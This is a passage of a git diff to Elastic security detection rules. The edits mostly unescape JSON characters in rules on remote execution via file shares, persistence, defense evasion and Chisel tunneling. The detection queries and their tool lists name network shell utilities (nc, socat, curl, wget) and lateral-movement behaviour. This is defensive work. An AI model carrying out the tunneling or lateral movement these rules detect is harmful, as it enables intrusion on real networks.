etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : \"exe\" or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json index 161052018e4..f8076dc1bd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : \"exe\" or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json index 10fe4866fdd..7ff93c936eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json index 207be73a11e..02963fa3cc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json index 8d6c465c812..4f842fb97a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json index 1e7685652b6..41b1dab8163 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json index 4730ff43ecd..2de6ce281d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json index 32168a90e56..a65c8374d70 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json index dbc9f246705..c021574aa28 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json index 489f3bdc07e..fbaaa5793a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json index e2995897693..af066efb200 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json index 52864e0e1f3..0b324665884 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json index cff06565fd0..3119b98ddbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json index 57aaeb4d863..eb5432cc0b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json index aea9200ee6f..5db04d23914 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json index 8e2181a9cb0..b88e7593c6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json index 54cc4bde9a5..4d4165e9027 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", 